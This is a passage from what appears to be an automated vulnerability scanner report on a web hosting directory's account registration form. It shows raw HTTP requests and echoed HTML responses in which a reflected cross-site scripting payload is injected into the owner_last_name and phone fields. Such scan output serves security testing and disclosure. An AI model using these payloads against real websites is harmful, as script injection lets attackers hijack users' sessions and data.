accounts</option><option value='325A5101EE356073FDBB6FA368FBDE566F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073549D8064E275C3C96F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073771C0C2A87E4991C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
'"--></style></script><script>alert(0x001CE4)</script>
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 579 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE4)%3c%2fscript%3e&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE3560736229B88A7A2FC0F3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE356073FD8C262E2A0492206F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE356073856869A1D615380CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE3560731F08383680609ECDC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE35607366CAF9AA8649A9D96F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073B2CFF49E59CD9E75C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE3560737BD6F32DD7D69FADC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE35607340E83C4BC2ABD50C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073ED81542F06DC87DDC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE3560734F973DD2713692A16F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE3560737E8C2E8AA887A5EFC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE35607366B214DAB8E00CC8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE3560731F45E6D60FADC52FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073D24BC5C5DAC4803CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE356073CCC306D8F07BB48CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073EA4F1F00DF233992C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE3560735A8D6214527DC28A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073AF9D507C11820F5B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE3560733CE6AFA9417F0F306F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
'"--></style></script><script>alert(0x001CF4)</script>
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CF4)%3c%2fscript%3e&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE356073792EF848CADED281C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE35607327CF68DE633120606F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE356073598EE309C3FC7663C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073211A6CE19BD1AE4CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073FCA98B308F125BBA6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073F97858D4A7FDDBFAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE3560737BDE7F9BB074ED8BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073C2C99549FAC7B7096F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073095ADAA083EF7D91C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073A0B70BBB2E681D016F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option 